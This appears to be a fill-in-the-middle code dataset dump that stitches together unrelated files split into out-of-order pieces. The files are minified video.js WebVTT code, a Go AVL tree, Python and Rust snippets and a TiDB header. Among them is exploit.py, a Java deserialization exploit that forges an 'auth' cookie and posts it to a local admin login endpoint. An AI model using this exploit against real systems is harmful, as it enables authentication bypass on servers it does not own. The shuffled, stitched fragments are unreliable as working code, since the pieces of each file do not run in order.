i=a.intersectPercentage(c);g>i&&(e=new l(a),g=i),a=new l(f)}return e||f}var f=new l(b),g=b.cue,h=i(g),j=[];if(g.snapToLines){var k;switch(g.vertical){case"":j=["+y","-y"],k="height";break;case"rl":j=["+x","-x"],k="width";break;case"lr":j=["-x","+x"],k="width"}var m=f.lineHeight,n=m*Math.round(h),o=c[k]+m,p=j[0];Math.abs(n)>o&&(n=0>n?-1:1,n*=Math.ceil(o/m)*m),0>h&&(n+=""===g.vertical?c.height:c.width,j=j.reverse()),f.move(p,n)}else{var q=f.lineHeight/c.height*100;switch(g.lineAlign){case"middle":h-=q/2;break;case"end":h-=q}switch(g.vertical){case"":b.applyStyles({top:b.formatStyle(h,"%")});break;case"rl":b.applyStyles({left:b.formatStyle(h,"%")});break;case"lr":b.applyStyles({right:b.formatStyle(h,"%")})}j=["+y","-x","+x","-y"],f=new l(b)}var r=e(f,j);b.move(r.toCSSCompatValues(c))}function n(){}var o=Object.create||function(){function a(){}return function(b){if(1!==arguments.length)throw new Error("Object.create shim only accepts one parameter.");return a.prototype=b,new a}}();b.prototype=o(Error.prototype),b.prototype.constructor=b,b.Errors={BadSignature:{code:0,message:"Malformed WebVTT signature."},BadTimeStamp:{code:1,message:"Malformed time stamp."}},d.prototype={set:function(a,b){this.get(a)||""===b||(this.values[a]=b)},get:function(a,b,c){return c?this.has(a)?this.values[a]:b[c]:this.has(a)?this.values[a]:b},has:function(a){return a in this.values},alt:function(a,b,c){for(var d=0;d<c.length;++d)if(b===c[d]){this.set(a,b);break}},integer:function(a,b){/^-?\d+$/.test(b)&&this.set(a,parseInt(b,10))},percent:function(a,b){var c;return(c=b.match(/^([\d]{1,3})(\.[\d]*)?%$/))&&(b=parseFloat(b),b>=0&&100>=b)?(this.set(a,b),!0):!1}};var p={"&":"&","<":"<",">":">","‎":"","‏":""," ":" "},q={c:"span",i:"i",b:"b",u:"u",ruby:"ruby",rt:"rt",v:"span",lang:"span"},r={v:"title",lang:"lang"},s={rt:"ruby"},t=[1470,1472,1475,1478,1488,1489,1490,1491,1492,1493,1494,1495,1496,1497,1498,1499,1500,1501,1502,1503,1504,1505,1506,1507,1508,1509,1510,1511,1512,1513,1514,1520,1521,1522,1523,1524,1544,1547,1549,1563,1566,1567,1568,1569,1570,1571,1572,1573,1574,1575,1576,1577,1578,1579,1580,1581,1582,1583,1584,1585,1586,1587,1588,1589,1590,1591,1592,1593,1594,1595,1596,1597,1598,1599,1600,1601,1602,1603,1604,1605,1606,1607,1608,1609,1610,1645,1646,1647,1649,1650,1651,1652,1653,1654,1655,1656,1657,1658,1659,1660,1661,1662,1663,1664,1665,1666,1667,1668,1669,1670,1671,1672,1673,1674,1675,1676,1677,1678,1679,1680,1681,1682,1683,1684,1685,1686,1687,1688,1689,1690,1691,1692,1693,1694,1695,1696,1697,1698,1699,1700,1701,1702,1703,1704,1705,1706,1707,1708,1709,1710,1711,1712,1713,1714,1715,1716,1717,1718,1719,1720,1721,1722,1723,1724,1725,1726,1727,1728,1729,1730,1731,1732,1733,1734,1735,1736,1737,1738,1739,1740,1741,1742,1743,1744,1745,1746,1747,1748,1749,1765,1766,1774,1775,1786,1787,1788,1789,1790,1791,1792,1793,1794,1795,1796,1797,1798,1799,1800,1801,1802,1803,1804,1805,1807,1808,1810,1811,1812,1813,1814,1815,1816,1817,1818,1819,1820,1821,1822,1823,1824,1825,1826,1827,1828,1829,1830,1831,1832,1833,1834,1835,1836,1837,1838,1839,1869,1870,1871,1872,1873,1874,1875,1876,1877,1878,1879,1880,1881,1882,1883,1884,1885,1886,1887,1888,1889,1890,1891,1892,1893,1894,1895,1896,1897,1898,1899,1900,1901,1902,1903,1904,1905,1906,1907,1908,1909,1910,1911,1912,1913,1914,1915,1916,1917,1918,1919,1920,1921,1922,1923,1924,1925,1926,1927,1928,1929,1930,1931,1932,1933,1934,1935,1936,1937,1938,1939,1940,1941,1942,1943,1944,1945,1946,1947,1948,1949,1950,1951,1952,1953,1954,1955,1956,1957,1969,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2e3,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022,2023,2024,2025,2026,2036,2037,2042,2048,2049,2050,2051,2052,2053,2054,2055,2056,2057,2058,2059,2060,2061,2062,2063,2064,2065,2066,2067,2068,2069,2074,2084,2088,2096,2097,2098,2099,2100,2101,2102,2103,2104,2105,2106,2107,2108,2109,2110,2112,2113,2114,2115,2116,2117,2118,2119,2120,2121,2122,2123,2124,2125,2126,2127,2128,2129,2130,2131,2132,2133,2134,2135,2136,2142,2208,2210,2211,2212,2213,2214,2215,2216,2217,2218,2219,2220,8207,64285,64287,64288,64289,64290,64291,64292,64293,64294,64295,64296,64298,64299,64300,64301,64302,64303,64304,64305,64306,64307,64308,64309,64310,64312,64313,64314,64315,64316,64318,64320,64321,64323,64324,64326,64327,64328,64329,64330,64331,64332,64333,64334,64335,64336,64337,64338,64339,64340,64341,64342,64343,64344,64345,64346,64347,64348,64349,64350,64351,64352,64353,64354,64355,64356,64357,64358,64359,64360,64361,64362,64363,64364,64365,64366,64367,64368,64369,64370,64371,64372,64373,64374,64375,64376,64377,64378,64379,64380,64381,64382,64383,64384,64385,64386,64387,64388,64389,64390,64391,64392,64393,64394,64395,64396,64397,64398,64399,64400,64401,64402,64403,64404,64405,64406,64407,64408,64409,64410,64411,64412,64413,64414,64415,64416,64417,64418,64419,64420,64421,64422,64423,64424,64425,64426,64427,64428,64429,64430,64431,64432,64433,64434,64435,64436,64437,64438,64439,64440,64441,64442,64443,64444,64445,64446,64447,64448,64449,64467,64468,64469,64470,64471,64472,64473,64474,64475,64476,64477,64478,64479,64480,64481,64482,64483,64484,64485,64486,64487,64488,64489,64490,64491,64492,64493,64494,64495,64496,64497,64498,64499,64500,64501,64502,64503,64504,64505,64506,64507,64508,64509,64510,64511,64512,64513,64514,64515,64516,64517,64518,64519,64520,64521,64522,64523,64524,64525,64526,64527,64528,64529,64530,64531,64532,64533,64534,64535,64536,64537,64538,64539,64540,64541,64542,64543,64544,64545,64546,64547,64548,64549,64550,64551,64552,64553,64554,64555,64556,64557,64558,64559,64560,64561,64562,64563,64564,64565,64566,64567,64568,64569,64570,64571,64572,64573,64574,64575,64576,64577,64578,64579,64580,64581,64582,64583,64584,64585,64586,64587,64588,64589,64590,64591,64592,64593,64594,64595,64596,64597,64598,64599,64600,64601,64602,64603,64604,64605,64606,64607,64608,64609,64610,64611,64612,64613,64614,64615,64616,64617,64618,64619,64620,64621,64622,64623,64624,64625,64626,64627,64628,64629,64630,64631,64632,64633,64634,64635,64636,64637,64638,64639,64640,64641,64642,64643,64644,64645,64646,64647,64648,64649,64650,64651,64652,64653,64654,64655,64656,64657,64658,64659,64660,64661,64662,64663,64664,64665,64666,64667,64668,64669,64670,64671,64672,64673,64674,64675,64676,64677,64678,64679,64680,64681,64682,64683,64684,64685,64686,64687,64688,64689,64690,64691,64692,64693,64694,64695,64696,64697,64698,64699,64700,64701,64702,64703,64704,64705,64706,64707,64708,64709,64710,64711,64712,64713,64714,64715,64716,64717,64718,64719,64720,64721,64722,64723,64724,64725,64726,64727,64728,64729,64730,64731,64732,64733,64734,64735,64736,64737,64738,64739,64740,64741,64742,64743,64744,64745,64746,64747,64748,64749,64750,64751,64752,64753,64754,64755,64756,64757,64758,64759,64760,64761,64762,64763,64764,64765,64766,64767,64768,64769,64770,64771,64772,64773,64774,64775,64776,64777,64778,64779,64780,64781,64782,64783,64784,64785,64786,64787,64788,64789,64790,64791,64792,64793,64794,64795,64796,64797,64798,64799,64800,64801,64802,64803,64804,64805,64806,64807,64808,64809,64810,64811,64812,64813,64814,64815,64816,64817,64818,64819,64820,64821,64822,64823,64824,64825,64826,64827,64828,64829,64848,64849,64850,64851,64852,64853,64854,64855,64856,64857,64858,64859,64860,64861,64862,64863,64864,64865,64866,64867,64868,64869,64870,64871,64872,64873,64874,64875,64876,64877,64878,64879,64880,64881,64882,64883,64884,64885,64886,64887,64888,64889,64890,64891,64892,64893,64894,64895,64896,64897,64898,64899,64900,64901,64902,64903,64904,64905,64906,64907,64908,64909,64910,64911,64914,64915,64916,64917,64918,64919,64920,64921,64922,64923,64924,64925,64926,64927,64928,64929,64930,64931,64932,64933,64934,64935,64936,64937,64938,64939,64940,64941,64942,64943,64944,64945,64946,64947,64948,64949,64950,64951,64952,64953,64954,64955,64956,64957,64958,64959,64960,64961,64962,64963,64964,64965,64966,64967,65008,65009,65010,65011,65012,65013,65014,65015,65016,65017,65018,65019,65020,65136,65137,65138,65139,65140,65142,65143,65144,65145,65146,65147,65148,65149,65150,65151,65152,65153,65154,65155,65156,65157,65158,65159,65160,65161,65162,65163,65164,65165,65166,65167,65168,65169,65170,65171,65172,65173,65174,65175,65176,65177,65178,65179,65180,65181,65182,65183,65184,65185,65186,65187,65188,65189,65190,65191,65192,65193,65194,65195,65196,65197,65198,65199,65200,65201,65202,65203,65204,65205,65206,65207,65208,65209,65210,65211,65212,65213,65214,65215,65216,65217,65218,65219,65220,65221,65222,65223,65224,65225,65226,65227,65228,65229,65230,65231,65232,65233,65234,65235,65236,65237,65238,65239,65240,65241,65242,65243,65244,65245,65246,65247,65248,65249,65250,65251,65252,65253,65254,65255,65256,65257,65258,65259,65260,65261,65262,65263,65264,65265,65266,65267,65268,65269,65270,65271,65272,65273,65274,65275,65276,67584,67585,67586,67587,67588,67589,67592,67594,67595,67596,67597,67598,67599,67600,67601,67602,67603,67604,67605,67606,67607,67608,67609,67610,67611,67612,67613,67614,67615,67616,67617,67618,67619,67620,67621,67622,67623,67624,67625,67626,67627,67628,67629,67630,67631,67632,67633,67634,67635,67636,67637,67639,67640,67644,67647,67648,67649,67650,67651,67652,67653,67654,67655,67656,67657,67658,67659,67660,67661,67662,67663,67664,67665,67666,67667,67668,67669,67671,67672,67673,67674,67675,67676,67677,67678,67679,67840,67841,67842,67843,67844,67845,67846,67847,67848,67849,67850,67851,67852,67853,67854,67855,67856,67857,67858,67859,67860,67861,67862,67863,67864,67865,67866,67867,67872,67873,67874,67875,67876,67877,67878,67879,67880,67881,67882,67883,67884,67885,67886,67887,67888,67889,67890,67891,67892,67893,67894,67895,67896,67897,67903,67968,67969,67970,67971,67972,67973,67974,67975,67976,67977,67978,67979,67980,67981,67982,67983,67984,67985,67986,67987,67988,67989,67990,67991,67992,67993,67994,67995,67996,67997,67998,67999,68e3,68001,68002,68003,68004,68005,68006,68007,68008,68009,68010,68011,68012,68013,68014,68015,68016,68017,68018,68019,68020,68021,68022,68023,68030,68031,68096,68112,68113,68114,68115,68117,68118,68119,68121,68122,68123,68124,68125,68126,68127,68128,68129,68130,68131,68132,68133,68134,68135,68136,68137,68138,68139,68140,68141,68142,68143,68144,68145,68146,68147,68160,68161,68162,68163,68164,68165,68166,68167,68176,68177,68178,68179,68180,68181,68182,68183,68184,68192,68193,68194,68195,68196,68197,68198,68199,68200,68201,68202,68203,68204,68205,68206,68207,68208,68209,68210,68211,68212,68213,68214,68215,68216,68217,68218,68219,68220,68221,68222,68223,68352,68353,68354,68355,68356,68357,68358,68359,68360,68361,68362,68363,68364,68365,68366,68367,68368,68369,68370,68371,68372,68373,68374,68375,68376,68377,68378,68379,68380,68381,68382,68383,68384,68385,68386,68387,68388,68389,68390,68391,68392,68393,68394,68395,68396,68397,68398,68399,68400,68401,68402,68403,68404,68405,68416,68417,68418,68419,68420,68421,68422,68423,68424,68425,68426,68427,68428,68429,68430,68431,68432,68433,68434,68435,68436,68437,68440,68441,68442,68443,68444,68445,68446,68447,68448,68449,68450,68451,68452,68453,68454,68455,68456,68457,68458,68459,68460,68461,68462,68463,68464,68465,68466,68472,68473,68474,68475,68476,68477,68478,68479,68608,68609,68610,68611,68612,68613,68614,68615,68616,68617,68618,68619,68620,68621,68622,68623,68624,68625,68626,68627,68628,68629,68630,68631,68632,68633,68634,68635,68636,68637,68638,68639,68640,68641,68642,68643,68644,68645,68646,68647,68648,68649,68650,68651,68652,68653,68654,68655,68656,68657,68658,68659,68660,68661,68662,68663,68664,68665,68666,68667,68668,68669,68670,68671,68672,68673,68674,68675,68676,68677,68678,68679,68680,126464,126465,126466,126467,126469,126470,126471,126472,126473,126474,126475,126476,126477,126478,126479,126480,126481,126482,126483,126484,126485,126486,126487,126488,126489,126490,126491,126492,126493,126494,126495,126497,126498,126500,126503,126505,126506,126507,126508,126509,126510,126511,126512,126513,126514,126516,126517,126518,126519,126521,126523,126530,126535,126537,126539,126541,126542,126543,126545,126546,126548,126551,126553,126555,126557,126559,126561,126562,126564,126567,126568,126569,126570,126572,126573,126574,126575,126576,126577,126578,126580,126581,126582,126583,126585,126586,126587,126588,126590,126592,126593,126594,126595,126596,126597,126598,126599,126600,126601,126603,126604,126605,126606,126607,126608,126609,126610,126611,126612,126613,126614,126615,126616,126617,126618,126619,126625,126626,126627,126629,126630,126631,126632,126633,126635,126636,126637,126638,126639,126640,126641,126642,126643,126644,126645,126646,126647,126648,126649,126650,126651,1114109];
j.prototype.applyStyles=function(a,b){b=b||this.div;for(var c in a)a.hasOwnProperty(c)&&(b.style[c]=a[c])},j.prototype.formatStyle=function(a,b){return 0===a?0:a+b},k.prototype=o(j.prototype),k.prototype.constructor=k,l.prototype.move=function(a,b){switch(b=void 0!==b?b:this.lineHeight,a){case"+x":this.left+=b,this.right+=b;break;case"-x":this.left-=b,this.right-=b;break;case"+y":this.top+=b,this.bottom+=b;break;case"-y":this.top-=b,this.bottom-=b}},l.prototype.overlaps=function(a){return this.left<a.right&&this.right>a.left&&this.top<a.bottom&&this.bottom>a.top},l.prototype.overlapsAny=function(a){for(var b=0;b<a.length;b++)if(this.overlaps(a[b]))return!0;return!1},l.prototype.within=function(a){return this.top>=a.top&&this.bottom<=a.bottom&&this.left>=a.left&&this.right<=a.right},l.prototype.overlapsOppositeAxis=function(a,b){switch(b){case"+x":return this.left<a.left;case"-x":return this.right>a.right;case"+y":return this.top<a.top;case"-y":return this.bottom>a.bottom}},l.prototype.intersectPercentage=function(a){var b=Math.max(0,Math.min(this.right,a.right)-Math.max(this.left,a.left)),c=Math.max(0,Math.min(this.bottom,a.bottom)-Math.max(this.top,a.top)),d=b*c;return d/(this.height*this.width)},l.prototype.toCSSCompatValues=function(a){return{top:this.top-a.top,bottom:a.bottom-this.bottom,left:this.left-a.left,right:a.right-this.right,height:this.height,width:this.width}},l.getSimpleBoxPosition=function(a){var b=a.div?a.div.offsetHeight:a.tagName?a.offsetHeight:0,c=a.div?a.div.offsetWidth:a.tagName?a.offsetWidth:0,d=a.div?a.div.offsetTop:a.tagName?a.offsetTop:0;a=a.div?a.div.getBoundingClientRect():a.tagName?a.getBoundingClientRect():a;var e={left:a.left,right:a.right,top:a.top||d,height:a.height||b,bottom:a.bottom||d+(a.height||b),width:a.width||c};return e},n.StringDecoder=function(){return{decode:function(a){if(!a)return"";if("string"!=typeof a)throw new Error("Error - expected string data.");return decodeURIComponent(encodeURIComponent(a))}}},n.convertCueToDOMTree=function(a,b){return a&&b?g(a,b):null};var u=.05,v="sans-serif",w="1.5%";n.processCues=function(a,b,c){function d(a){for(var b=0;b<a.length;b++)if(a[b].hasBeenReset||!a[b].displayState)return!0;return!1}if(!a||!b||!c)return null;for(;c.firstChild;)c.removeChild(c.firstChild);var e=a.document.createElement("div");if(e.style.position="absolute",e.style.left="0",e.style.right="0",e.style.top="0",e.style.bottom="0",e.style.margin=w,c.appendChild(e),d(b)){var f=[],g=l.getSimpleBoxPosition(e),h=Math.round(g.height*u*100)/100,i={font:h+"px "+v};!function(){for(var c,d,h=0;h<b.length;h++)d=b[h],c=new k(a,d,i),e.appendChild(c.div),m(a,c,g,f),d.displayState=c.div,f.push(l.getSimpleBoxPosition(c))}()}else for(var j=0;j<b.length;j++)e.appendChild(b[j].displayState)},n.Parser=function(a,b,c){c||(c=b,b={}),b||(b={}),this.window=a,this.vttjs=b,this.state="INITIAL",this.buffer="",this.decoder=c||new TextDecoder("utf8"),this.regionList=[]},n.Parser.prototype={reportOrThrowError:function(a){if(!(a instanceof b))throw a;this.onparsingerror&&this.onparsingerror(a)},parse:function(a){function c(){for(var a=i.buffer,b=0;b<a.length&&"\r"!==a[b]&&"\n"!==a[b];)++b;var c=a.substr(0,b);return"\r"===a[b]&&++b,"\n"===a[b]&&++b,i.buffer=a.substr(b),c}function g(a){var b=new d;if(e(a,function(a,c){switch(a){case"id":b.set(a,c);break;case"width":b.percent(a,c);break;case"lines":b.integer(a,c);break;case"regionanchor":case"viewportanchor":var e=c.split(",");if(2!==e.length)break;var f=new d;if(f.percent("x",e[0]),f.percent("y",e[1]),!f.has("x")||!f.has("y"))break;b.set(a+"X",f.get("x")),b.set(a+"Y",f.get("y"));break;case"scroll":b.alt(a,c,["up"])}},/=/,/\s/),b.has("id")){var c=new(i.vttjs.VTTRegion||i.window.VTTRegion);c.width=b.get("width",100),c.lines=b.get("lines",3),c.regionAnchorX=b.get("regionanchorX",0),c.regionAnchorY=b.get("regionanchorY",100),c.viewportAnchorX=b.get("viewportanchorX",0),c.viewportAnchorY=b.get("viewportanchorY",100),c.scroll=b.get("scroll",""),i.onregion&&i.onregion(c),i.regionList.push({id:b.get("id"),region:c})}}function h(a){e(a,function(a,b){switch(a){case"Region":g(b)}},/:/)}var i=this;a&&(i.buffer+=i.decoder.decode(a,{stream:!0}));try{var j;if("INITIAL"===i.state){if(!/\r\n|\n/.test(i.buffer))return this;j=c();var k=j.match(/^WEBVTT([ \t].*)?$/);if(!k||!k[0])throw new b(b.Errors.BadSignature);i.state="HEADER"}for(var l=!1;i.buffer;){if(!/\r\n|\n/.test(i.buffer))return this;switch(l?l=!1:j=c(),i.state){case"HEADER":/:/.test(j)?h(j):j||(i.state="ID");continue;case"NOTE":j||(i.state="ID");continue;case"ID":if(/^NOTE($|[ \t])/.test(j)){i.state="NOTE";break}if(!j)continue;if(i.cue=new(i.vttjs.VTTCue||i.window.VTTCue)(0,0,""),i.state="CUE",-1===j.indexOf("-->")){i.cue.id=j;continue}case"CUE":try{f(j,i.cue,i.regionList)}catch(m){i.reportOrThrowError(m),i.cue=null,i.state="BADCUE";continue}i.state="CUETEXT";continue;case"CUETEXT":var n=-1!==j.indexOf("-->");if(!j||n&&(l=!0)){i.oncue&&i.oncue(i.cue),i.cue=null,i.state="ID";continue}i.cue.text&&(i.cue.text+="\n"),i.cue.text+=j;continue;case"BADCUE":j||(i.state="ID");continue}}}catch(m){i.reportOrThrowError(m),"CUETEXT"===i.state&&i.cue&&i.oncue&&i.oncue(i.cue),i.cue=null,i.state="INITIAL"===i.state?"BADWEBVTT":"BADCUE"}return this},flush:function(){var a=this;try{if(a.buffer+=a.decoder.decode(),(a.cue||"HEADER"===a.state)&&(a.buffer+="\n\n",a.parse()),"INITIAL"===a.state)throw new b(b.Errors.BadSignature)}catch(c){a.reportOrThrowError(c)}return a.onflush&&a.onflush(),this}},a.WebVTT=n}(this,this.vttjs||{});
//# sourceMappingURL=video.min.js.map | e |
exploit.py | import requests
from subprocess import Popen, PIPE
def console(cmd):
|
console("javac exploits/JavaSerializationExploit/src/main/java/DoSerialize.java")
cookieval = console("java DoSerialize")
cookie = {'auth': cookieval[1].strip()}
r = requests.post('http://localhost:8081/admin/login', cookies=cookie, data=" ",allow_redirects=True)
print r.text
| p = Popen(cmd, shell=True, stdout=PIPE)
out, err = p.communicate()
return (p.returncode, out, err) |
avltree.go | // Copyright (c) 2017, Benjamin Scher Purcell. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package avltree implements an AVL balanced binary tree.
//
// Structure is not thread safe.
//
// References: https://en.wikipedia.org/wiki/AVL_tree
package avltree
import (
"fmt"
"github.com/douguohai/gods/trees"
"github.com/douguohai/gods/utils"
)
func assertTreeImplementation() {
var _ trees.Tree = new(Tree)
}
// Tree holds elements of the AVL tree.
type Tree struct {
Root *Node // Root node
Comparator utils.Comparator // Key comparator
size int // Total number of keys in the tree
}
// Node is a single element within the tree
type Node struct {
Key interface{}
Value interface{}
Parent *Node // Parent node
Children [2]*Node // Children nodes
b int8
}
// NewWith instantiates an AVL tree with the custom comparator.
func NewWith(comparator utils.Comparator) *Tree {
return &Tree{Comparator: comparator}
}
// NewWithIntComparator instantiates an AVL tree with the IntComparator, i.e. keys are of type int.
func NewWithIntComparator() *Tree {
return &Tree{Comparator: utils.IntComparator}
}
// NewWithStringComparator instantiates an AVL tree with the StringComparator, i.e. keys are of type string.
func NewWithStringComparator() *Tree {
return &Tree{Comparator: utils.StringComparator}
}
// Put inserts node into the tree.
// Key should adhere to the comparator's type assertion, otherwise method panics.
func (t *Tree) Put(key interface{}, value interface{}) {
t.put(key, value, nil, &t.Root)
}
// Get searches the node in the tree by key and returns its value or nil if key is not found in tree.
// Second return parameter is true if key was found, otherwise false.
// Key should adhere to the comparator's type assertion, otherwise method panics.
func (t *Tree) Get(key interface{}) (value interface{}, found bool) {
n := t.Root
for n != nil {
cmp := t.Comparator(key, n.Key)
switch {
case cmp == 0:
return n.Value, true
case cmp < 0:
n = n.Children[0]
case cmp > 0:
n = n.Children[1]
}
}
return nil, false
}
// Remove remove the node from the tree by key.
// Key should adhere to the comparator's type assertion, otherwise method panics.
func (t *Tree) Remove(key interface{}) {
t.remove(key, &t.Root)
}
// Empty returns true if tree does not contain any nodes.
func (t *Tree) Empty() bool {
return t.size == 0
}
// Size returns the number of elements stored in the tree.
func (t *Tree) Size() int {
return t.size
}
// Keys returns all keys in-order
func (t *Tree) Keys() []interface{} {
keys := make([]interface{}, t.size)
it := t.Iterator()
for i := 0; it.Next(); i++ {
keys[i] = it.Key()
}
return keys
}
// Values returns all values in-order based on the key.
func (t *Tree) Values() []interface{} {
values := make([]interface{}, t.size)
it := t.Iterator()
for i := 0; it.Next(); i++ {
values[i] = it.Value()
}
return values
}
// Left returns the minimum element of the AVL tree
// or nil if the tree is empty.
func (t *Tree) Left() *Node {
return t.bottom(0)
}
// Right returns the maximum element of the AVL tree
// or nil if the tree is empty.
func (t *Tree) Right() *Node {
return t.bottom(1)
}
// Floor Finds floor node of the input key, return the floor node or nil if no ceiling is found.
// Second return parameter is true if floor was found, otherwise false.
//
// Floor node is defined as the largest node that is smaller than or equal to the given node.
// A floor node may not be found, either because the tree is empty, or because
// all nodes in the tree is larger than the given node.
//
// Key should adhere to the comparator's type assertion, otherwise method panics. | found = false
n := t.Root
for n != nil {
c := t.Comparator(key, n.Key)
switch {
case c == 0:
return n, true
case c < 0:
n = n.Children[0]
case c > 0:
floor, found = n, true
n = n.Children[1]
}
}
if found {
return
}
return nil, false
}
// Ceiling finds ceiling node of the input key, return the ceiling node or nil if no ceiling is found.
// Second return parameter is true if ceiling was found, otherwise false.
//
// Ceiling node is defined as the smallest node that is larger than or equal to the given node.
// A ceiling node may not be found, either because the tree is empty, or because
// all nodes in the tree is smaller than the given node.
//
// Key should adhere to the comparator's type assertion, otherwise method panics.
func (t *Tree) Ceiling(key interface{}) (floor *Node, found bool) {
found = false
n := t.Root
for n != nil {
c := t.Comparator(key, n.Key)
switch {
case c == 0:
return n, true
case c < 0:
floor, found = n, true
n = n.Children[0]
case c > 0:
n = n.Children[1]
}
}
if found {
return
}
return nil, false
}
// Clear removes all nodes from the tree.
func (t *Tree) Clear() {
t.Root = nil
t.size = 0
}
// String returns a string representation of container
func (t *Tree) String() string {
str := "AVLTree\n"
if !t.Empty() {
output(t.Root, "", true, &str)
}
return str
}
func (n *Node) String() string {
return fmt.Sprintf("%v", n.Key)
}
func (t *Tree) put(key interface{}, value interface{}, p *Node, qp **Node) bool {
q := *qp
if q == nil {
t.size++
*qp = &Node{Key: key, Value: value, Parent: p}
return true
}
c := t.Comparator(key, q.Key)
if c == 0 {
q.Key = key
q.Value = value
return false
}
if c < 0 {
c = -1
} else {
c = 1
}
a := (c + 1) / 2
var fix bool
fix = t.put(key, value, q, &q.Children[a])
if fix {
return putFix(int8(c), qp)
}
return false
}
func (t *Tree) remove(key interface{}, qp **Node) bool {
q := *qp
if q == nil {
return false
}
c := t.Comparator(key, q.Key)
if c == 0 {
t.size--
if q.Children[1] == nil {
if q.Children[0] != nil {
q.Children[0].Parent = q.Parent
}
*qp = q.Children[0]
return true
}
fix := removeMin(&q.Children[1], &q.Key, &q.Value)
if fix {
return removeFix(-1, qp)
}
return false
}
if c < 0 {
c = -1
} else {
c = 1
}
a := (c + 1) / 2
fix := t.remove(key, &q.Children[a])
if fix {
return removeFix(int8(-c), qp)
}
return false
}
func removeMin(qp **Node, minKey *interface{}, minVal *interface{}) bool {
q := *qp
if q.Children[0] == nil {
*minKey = q.Key
*minVal = q.Value
if q.Children[1] != nil {
q.Children[1].Parent = q.Parent
}
*qp = q.Children[1]
return true
}
fix := removeMin(&q.Children[0], minKey, minVal)
if fix {
return removeFix(1, qp)
}
return false
}
func putFix(c int8, t **Node) bool {
s := *t
if s.b == 0 {
s.b = c
return true
}
if s.b == -c {
s.b = 0
return false
}
if s.Children[(c+1)/2].b == c {
s = singlerot(c, s)
} else {
s = doublerot(c, s)
}
*t = s
return false
}
func removeFix(c int8, t **Node) bool {
s := *t
if s.b == 0 {
s.b = c
return false
}
if s.b == -c {
s.b = 0
return true
}
a := (c + 1) / 2
if s.Children[a].b == 0 {
s = rotate(c, s)
s.b = -c
*t = s
return false
}
if s.Children[a].b == c {
s = singlerot(c, s)
} else {
s = doublerot(c, s)
}
*t = s
return true
}
func singlerot(c int8, s *Node) *Node {
s.b = 0
s = rotate(c, s)
s.b = 0
return s
}
func doublerot(c int8, s *Node) *Node {
a := (c + 1) / 2
r := s.Children[a]
s.Children[a] = rotate(-c, s.Children[a])
p := rotate(c, s)
switch {
default:
s.b = 0
r.b = 0
case p.b == c:
s.b = -c
r.b = 0
case p.b == -c:
s.b = 0
r.b = c
}
p.b = 0
return p
}
func rotate(c int8, s *Node) *Node {
a := (c + 1) / 2
r := s.Children[a]
s.Children[a] = r.Children[a^1]
if s.Children[a] != nil {
s.Children[a].Parent = s
}
r.Children[a^1] = s
r.Parent = s.Parent
s.Parent = r
return r
}
func (t *Tree) bottom(d int) *Node {
n := t.Root
if n == nil {
return nil
}
for c := n.Children[d]; c != nil; c = n.Children[d] {
n = c
}
return n
}
// Prev returns the previous element in an inorder
// walk of the AVL tree.
func (n *Node) Prev() *Node {
return n.walk1(0)
}
// Next returns the next element in an inorder
// walk of the AVL tree.
func (n *Node) Next() *Node {
return n.walk1(1)
}
func (n *Node) walk1(a int) *Node {
if n == nil {
return nil
}
if n.Children[a] != nil {
n = n.Children[a]
for n.Children[a^1] != nil {
n = n.Children[a^1]
}
return n
}
p := n.Parent
for p != nil && p.Children[a] == n {
n = p
p = p.Parent
}
return p
}
func output(node *Node, prefix string, isTail bool, str *string) {
if node.Children[1] != nil {
newPrefix := prefix
if isTail {
newPrefix += "│ "
} else {
newPrefix += " "
}
output(node.Children[1], newPrefix, false, str)
}
*str += prefix
if isTail {
*str += "└── "
} else {
*str += "┌── "
}
*str += node.String() + "\n"
if node.Children[0] != nil {
newPrefix := prefix
if isTail {
newPrefix += " "
} else {
newPrefix += "│ "
}
output(node.Children[0], newPrefix, true, str)
}
} | func (t *Tree) Floor(key interface{}) (floor *Node, found bool) { |
facade_abc.py | from abc import ABC
class AbcFacade(ABC):
"""Any interface will expect to be able to invoke the following methods."""
def count_rows(self):
pass | pass
def get_last_workday(self):
pass
def delete_history(self):
pass
def disconnect(self):
pass |
def get_rows(self): |
configuration.py | import yaml
from enum import Enum
class SimulationType(Enum):
explosion = "EXPLOSION"
collision = "COLLISION"
class SatType(Enum):
rb = "RB"
sat = "SC"
soc = "SOC"
deb = "DEB"
class SimulationConfiguration:
# Takes a .yaml file with simulation configurations
def __init__(self, filePath: str):
try:
with open(filePath, 'r') as stream:
data_loaded = yaml.safe_load(stream)
self._minimalCharacteristicLength = float(
data_loaded['minimalCharacteristicLength'])
self._simulationType = SimulationType(data_loaded['simulationType'].upper())
self._sat_type = SatType(data_loaded['satType'].upper())
self._mass_conservation = bool(data_loaded['massConservation'])
stream.close()
except Exception as e:
print(f"Exception: {e}")
@property
def minimalCharacteristicLength(self) -> float:
return self._minimalCharacteristicLength
@property
def simulationType(self) -> SimulationType:
return self._simulationType
@property
def sat_type(self) -> SatType: | def mass_conservation(self) -> bool:
return self._mass_conservation | return self._sat_type
@property |
pages.rs | mod artist;
mod artists;
mod index;
mod player;
mod queue;
mod songs;
pub use artist::ArtistPage;
pub use artists::ArtistsPage;
pub use index::IndexPage;
pub use player::PlayerPage;
pub use queue::QueuePage;
pub use songs::SongsPage; | ||
tidb_vars.go | // Copyright 2017 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// See the License for the specific language governing permissions and
// limitations under the License.
package variable
import (
"math"
"github.com/pingcap/parser/mysql"
"github.com/pingcap/tidb/config"
"github.com/uber-go/atomic"
)
/*
Steps to add a new TiDB specific system variable:
1. Add a new variable name with comment in this file.
2. Add the default value of the new variable in this file.
3. Add SysVar instance in 'defaultSysVars' slice with the default value.
4. Add a field in `SessionVars`.
5. Update the `NewSessionVars` function to set the field to its default value.
6. Update the `variable.SetSessionSystemVar` function to use the new value when SET statement is executed.
7. If it is a global variable, add it in `session.loadCommonGlobalVarsSQL`.
8. Update ValidateSetSystemVar if the variable's value need to be validated.
9. Use this variable to control the behavior in code.
*/
// TiDB system variable names that only in session scope.
const (
